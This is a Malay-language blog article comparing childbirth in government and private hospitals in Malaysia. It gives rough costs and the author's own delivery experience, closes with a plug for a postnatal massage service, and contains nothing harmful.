Menurut Datuk Dr. S. Subramaniam, mantan Menteri Kesihatan, setiap doktor pelatih wajib menjalani latihan selama dua tahun di hospital kerajaan. Mengikut logiknya, hospital kerajaan adalah medan yang sesuai untuk melatih mereka menjadi doktor yang baik dan oleh kerana itu, pada pendapat peribadi saya, staf di hospital kerajaan lebih terlatih berbanding swasta. Ini membuatkan masa menunggu lebih berbaloi walaupun lebih lama berbanding di hospital swasta.

Masa menunggu dirasakan lebih pendek di hospital swasta, mungkin kerana suasana menunggu yang selesa. Kebiasaannya ruang menunggu berkeadaan seperti lobi hotel, berbanding hospital kerajaan yang rata-rata menggunakan kerusi plastik dan barisannya berhimpit muat-muat untuk dilalui.

Memilih untuk tinggal lebih awal dan lama di hospital swasta adalah tidak digalakkan jika tiada sebarang komplikasi. Jika bukaan vagina anda belum melebihi 3cm, anda akan diminta pulang dahulu  walaupun hakikatnya anda mampu membayar caj mengikut bilangan bermalam, demi menunggu bukaan.  Jika di hospital kerajaan pula, jika sudah pasti tanda hendak bersalin, anda akan ditahan di wad untuk pemerhatian rapi sehingga anda selamat bersalin.

  1. Mahal atau Murah?

Di hospital swasta, kadar yang dikenakan adalah sepuluh atau lebih kali ganda berbanding dengan kadar dikenakan hospital kerajaan. Kos untuk bersalin normal berjumlah kira-kira RM 3,000 manakala untuk kelahiran melalui pembedahan Caesarean adalah kira-kira RM10,000. Kos tersebut adalah yang termaktub pada pakej dan syarat ditetapkan. Sekiranya berlaku sebarang komplikasi, caj tambahan akan dikenakan.

Kos melakukan pemeriksaan kandungan yang biasa di hospital swasta adalah berjumlah mendekati RM 300. Contohnya, kadar biasa untuk menerima nasihat dari doktor pakar bernilai RM 150, kos ubatan bernilai RM 30, sewaan mesin ultrasound pula RM 55, caj khidmat staf untuk menggunakan mesin ultrasound pula sekitar RM 30 atau lebih. Ia jauh lebih mahal berbanding jumlah keseluruhan pemeriksaan dan bersalin di hospital kerajaan. Apa yang penting, tepuklah poket tanya selera.

 

Pengalaman saya sendiri

Saya perlu melalui bahagian kecemasan kerana air ketuban pecah pada usia kandungan 34 minggu 5 hari, iaitu dua hari sebelum fetus digelar ‘full term’ atau matang. Saya diterima masuk dengan mudah tanpa sebarang tempahan dan terus dilayan oleh doktor pelatih yang bertugas.

Setelah saya bersalin, saya ditempatkan di wad yang berisi seramai lapan orang, kurang sesak namun masih juga kurang selesa. Lagi menyedihkan, saya telah ‘diarahkan’ keluar/discaj  dalam tempoh kurang 24 jam bersalin demi memberi ruang kepada pesakit lain. Saya bersalin pada jam 4 pagi setelah bertarung sejak jam 10 malam. Kemudian pada pukul 4 petang hari yang sama, saya perlu keluar setelah ‘lulus’ segala ujian jahitan dan seluk untuk mengesan darah beku yang tertinggal.

Lain kisahnya dengan kakak saya yang telah menggunakan khidmat doktor yang sama untuk rawatan kesuburan hinggalah menyambut keempat-empat anaknya. Malah kakak saya menggunakan bilik yang sama iaitu bilik perseorangan yang lengkap dengan tandas sendiri, penyaman udara dan penutup tirai untuk privasi. Jadual lawatan waris pula jauh lebih longgar berbanding di hospital kerajaan.

Kadar untuk wad yang saya duduki adalah sekitar RM5 setiap malam. Ketika saya berjalan ke tandas, saya melalui sebuah bilik berenam yang ternyata lebih privasi, dekat dengan tandas dan bilik bayi. Saya sempat menjenguk dan kelihatan hanya dua pesakit sedang berada di wad itu, salah seorangnya pula sedang berkemas dan saya mengagak, mungkin dia sudah boleh pulang.

Saya segera bertanya kepada jururawat yang terdekat untuk cuba mendapatkan tempat di wad istimewa itu kerana saya percaya setakat RM 60 satu malam, apalah sangat. Saya memberi alasan ‘kukuh’ kepada jururawat itu supaya menempatkan saya di wad tersebut supaya saya dekat dengan wad bayi demi memudahkan saya menyusukan anak saya. Jururawat itu terus memberikan jawapan yang ringkas kepada saya; “Puan, wad itu untuk pesakit yang ada masalah jantung”.

Saya terdiam seketika, mengucapkan terima kasih dan berlalu pergi. Fahamlah saya, rezeki masing-masing sudah tertulis. Tak boleh sewenangnya membanding dan mempersoalkan kehidupan orang lain sedangkan kita tak tahu apa yang perlu ditanggung mereka. Lagipun, saya telah didiscaj keluar sebelum sempat bermalam setelah bersalin, berikutan saya tiada sebarang komplikasi.

Jumlah wang yang perlu suami saya bayar untuk keseluruhan kos saya bersalin, bermalam, kos rawatan kuning, segala suntikan vitamin/ubat berserta enam malam bayi saya di wad adalah kurang dari RM 200. Malahan, saya bertuah kerana boleh mengusung balik pelbagai set sampel barangan mandi dan lampin yang diberikan secara percuma oleh penaja melalui pihak hospital.

Apabila dikenang kembali saat pemeriksaan berkala di klinik kesihatan kerajan ketika mengandung, saya merasakan semuanya berbaloi berbanding jika memilih untuk melakukan pemeriksaan di hospital swasta. Selain daripada nasihat percuma secara bersemuka dan demonstrasi yang ditawarkan, nota juga sudah tersedia untuk rujukan pada bila-bila masa.

Nota berkenaan maklumat kandungan berdasarkan usia, mengenali tanda hendak bersalin, posisi tidur, posisi bekerja ibu mengandung, nutrien, perkembangan bayi, keperluan diet, dan pelbagai lagi maklumat penting sudah ada dalam buku Rekod Kandungan dan Buku Rekod Bayi. Semasa saya menerima nasihat dan praktikal dari jururawat, beliau membuka dan menggariskan segala isi penting dari buku saya itu. Seribu satu ilmu saya terima dan alhamdulillah saya merasai keikhlasan dan ketelitian setiap perkhidmatan yang ditawarkan.

 

Bagaimana, pilih bersalin di hospital kerajaan atau swasta?

Melalui perbandingan diatas, kelebihan dari segi ruang privasi, keselesaan dan masa  ternyata menyebelahi mereka yang memilih hospital swasta. Sesetengah perkhidmatan sampingan yang hampir tidak diperlukan juga disediakan mereka seperti kemudahan pakej dan pilihan tarikh. Namun, perkara yang amat dititikberatkan adalah ketelitian prosedur dan perkhidmatan yang lengkap pada harga yang murah, adalah ditawarkan oleh hospital kerajaan.

Hospital kerajaan menyediakan perkhidmatan yang teliti dan murah sejak dari pada fasa perancangan keluarga, pemeriksaan kandungan, menyambut kelahiran dan jagaan setelah bersalin. Kesimpulannya, pada jangka masa yang panjang, tampak jelas hospital kerajaan adalah pilihan yang lebih bijak dan lebih baik berbanding hospital swasta.

Yang penting, tak kisah samada bersalin di hospital kerajaan atau swasta, jika perlukan tukang urut selepas bersalin, boleh dapatkan dari PantangPlus.com. Segalanya lengkap!

Apa yang orang lain cari?:

  • bersalin normal dihospital swasta
  • kos operation bersalin di hospital kerajaan
  • berapakah kos bersalin di hospital swasta
  • beza bersalin hospital kerajaan dan swasta
  • beza klinik swasta dan kerajaan
  • boleh ke berjalan jauh sebelum tarikh bersalin
  • ibu bersalin di hospital
  • kebaikan bersalin di hospital swasta
  • keistimewaan klinik swasta
  • kelebihan bersalin hospital swasta
  • keperluan bersalin di hospital government 2019
  • kos bersalin di hospital kerajaan
  • kos bersalin hospital kerajaan 2019
  • perbezaan klinik swasta dan klinik kerajaan
  • signboard labor room hospital shah alam